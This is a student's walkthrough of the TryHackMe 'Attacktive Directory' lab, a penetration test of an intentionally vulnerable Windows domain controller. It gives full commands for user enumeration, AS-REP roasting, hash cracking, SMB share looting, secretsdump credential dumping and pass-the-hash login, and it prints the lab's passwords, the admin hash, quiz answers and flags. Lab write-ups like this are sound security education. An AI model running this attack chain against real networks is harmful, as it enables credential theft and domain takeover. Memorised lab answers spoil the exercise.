Attacktive Directory TryHackMe Lab HACKING ACTIVE DIRECTORY
Exploiting Vulnerable Domain Controller.
Steps
1.Connect VM
Connect vm sudo openvpn lglen001.ovpn
2.
Follow the steps https://tryhackme.com/room/attacktivedirectory
3.
In the enumeration tab we wll run a basic nmap scan NMAP [target IP]
4.
I can assume it is running active directory by seeing Kerberos, net bios and ldap are running on port 389 ldap, 88 kerberos, 139 netbios.
5.
If we want to see the service on the machine we will run nmap [target ip] -sv
6.
After this we get the third answer being .local (TLD is top level domain)
7.
Going back to the first question we can use enum4linux we can also use msf console even though the answer is enum 4 linux
8.
I Can see from the output that we get THM-AD as the domain
9.
Msfconsole attempt
10.
msfconsole
11.
Use auxilary/scanner/smb/smb_version
12.
Show options
13.
Set RHOSTS [target ip]
14.
Run
15.
We will then see the domain name
What tool will allow us to enumerate port 139/445? enum4linux
What is the NetBIOS-Domain Name of the machine? THM-AD
What invalid TLD do people commonly use for their Active Directory Domain? .local
Enumerating users via kerbros
1.
Now enumerate users
2.
Follow the steps to download kerbrute https://github.com/ropnop/kerbrute/releases
3.
After a lot of failure I realized that none of the packages will run in my vm because my host machien is ARM64 not amd64 I suggest using a different tool if needed. But for this lab this tool is necessary. I used linwinpwn with the rid brute force option.
4.
Follow steps in another environment or their attack box
5.
Cd kerbrute directory
6.
./kerbrute_linux_amd64 userenum -d spookysec.local --dc [target machine domain controller] users.txt
7.
Answer the try hack me questions. What command within Kerbrute will allow us to enumerate valid usernames? Userenum
What notable account is discovered? (These should jump out at you) svc-admin
What is the other notable account is discovered? (These should jump out at you) backup
Exploiting active directory
1.I will use impacket for this section and use GetNPUsers.py
The tool is in /opt/impacket/examples/ so cd /opt/impacket/examples/
2.
Python3 GetNPUsers.py to get help option
3.
python3 GetNPUsers.py spookysec.local/svc-admin -no-pass -dc-ip 10.10.115.28 we run this command using our domain name /svc-sdmin user no password and use the domain controlllers IP
4.
This command is what we need to produce the TGT output for SVC-ADMIN which is the hash value
5.
Now hash crack start by cd /desktop directory makes sure we nano hash.txt and place our hash in that file. We will use john to crack the hash.
6.
john hash.txt --wordlist=passwords.txt
7.
Our password that we recived for svc-admin is management2005
8.
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?svc-admin
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name) Kerberos 5 AS-REP etype 23
What mode is the hash? 18200
Now crack the hash with the modified password list provided, what is the user accounts password?management2005
Enumeration shares
1.
We can use smbclient for smb enumeration we will run this command
2.
sudo smbclient -U spookysec.local/svc-admin -L //10.10.115.28
3.
We will enter the password we recived for svc -admin management2005
4.
Then we will receive all shares in the environment
5.
In those 6 shares we see want to see what is in smb share backup use command the only one we can get into
6.
We will get smb directory prompt
7.
Use command pwd to see current directory
8.
Ls command
9.
Then get backup_credentials.txt
10.
Nano backup_credintials.txt
11.
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw is the output txt in the file is in base64
12.
Go online and use a base64 decoder
13.
Decode output : backup@spookysec.local:backup2517860
14.
What utility can we use to map remote SMB shares? smbclient
Which option will list shares? -L
Hint
How many remote shares is the server listing? 6
There is one particular share that we have access to that contains a text file. Which share is it? backup
What is the content of the file? YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
Decoding the contents of the file, what is the full contents? backup@spookysec.local:backup2517860
Elevating privileges in domain
Since I have gained more privileges with my backup user account, I now possess greater authority compared to before. As the backup account for the Domain Controller, I enjoy elevated privileges beyond regular users. A unique permission is assigned to this account, enabling synchronization of all Active Directory modifications with my user account, including password hashes.
Given this valuable information, I can leverage a tool called "secretsdump.py" within Impacket. This powerful tool allows me to extract all the password hashes associated with the user account that remains in sync with the domain controller. By exploiting this capability, I will effectively gain complete control over the AD Domain.
1.
The tool is in /opt/impacket/examples/ so cd /opt/impacket/examples/
2.
Sudo Secretsdump.py
3.
Sudo Secretsdump.py -dc-ip 10.10.171.96 spookysec.local/backup:backup2517860@10.10.171.96
4.
This command gets us the Hash to all of the accounts on this active directory.We are interested the NTLM Hash and it is the third string 0e0363213e37b94221497260b0bcb4fc
5.
We go to a fresh terminal and cd /opt/impacket/examples/
6.
We will then use a tool that allows us to gain access through which is evil-winrm
7.
The command : sudo evil-winrm -i 10.10.171.96 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
8.
If it works I'll get administrator access to administrator directory.
9.
From that point we can complete the Attacktive Directory tryhackme lab
10.
What method allowed us to dump NTDS.DIT? DRSUAPI
What is the Administrators NTLM hash? 0e0363213e37b94221497260b0bcb4fc
What method of attack could allow us to authenticate as the user without the password?Pass The Hash
Using a tool called Evil-WinRM what option will allow us to use a hash? -H
11.
svc-admin :TryHackMe{K3rb3r0s_Pr3_4uth}
Backup :TryHackMe{B4ckM3UpSc0tty!}
Administrator :TryHackMe{4ctiveD
1rectoryM4st3r}
Lessons Learned
During the Attacktive Directory TryHackMe engagement, several important lessons were learned.
Firstly, it is crucial to establish a secure connection to the virtual machine by following the provided instructions, such as using the appropriate OpenVPN configuration file.
Secondly, meticulously following the step-by-step guidelines and instructions provided in the lab or resource is paramount for success. Enumeration plays a vital role in penetration testing, and tools like Nmap should be used to identify the services running on the target machine. Paying attention to port numbers and associated services, such as Kerberos, LDAP, and NetBIOS running on ports 389, 88, and 139 respectively, can indicate the presence of Active Directory.
Enumeration tools like enum4linux and Metasploit's Msfconsole are helpful for gathering information and performing reconnaissance. Understanding the target system's architecture is important, as some tools may not be compatible, and verifying compatibility between ARM64 and amd64 is crucial.
Exploiting Active Directory often involves extracting user account information, such as usernames and password hashes. Impacket, a powerful Python library, provides various tools for interacting with Active Directory, including GetNPUsers.py for retrieving password hashes and secretsdump.py for dumping NTDS.DIT. Hash cracking tools like John the Ripper can be employed to recover plaintext passwords from the hashes.
Smbclient proves valuable for SMB enumeration, listing shares, and accessing files within those shares. It is essential to decode any encoded content, such as base64-encoded files, using available online decoding tools.
Privilege escalation is possible by leveraging higher privileged user accounts, such as the backup account, which may provide access to additional resources and sensitive information. Tools like secretsdump.py from Impacket can be used to retrieve password hashes synced with the domain controller.
Evil-WinRM, a remote Windows command execution tool, can exploit the obtained password hashes to gain unauthorized access to the target machine. Proper documentation of discovered credentials and associated user accounts is essential for progress throughout the engagement.
These lessons provide valuable insights for conducting penetration testing and highlight the importance of following ethical guidelines and obtaining legal authorization for security testing activities.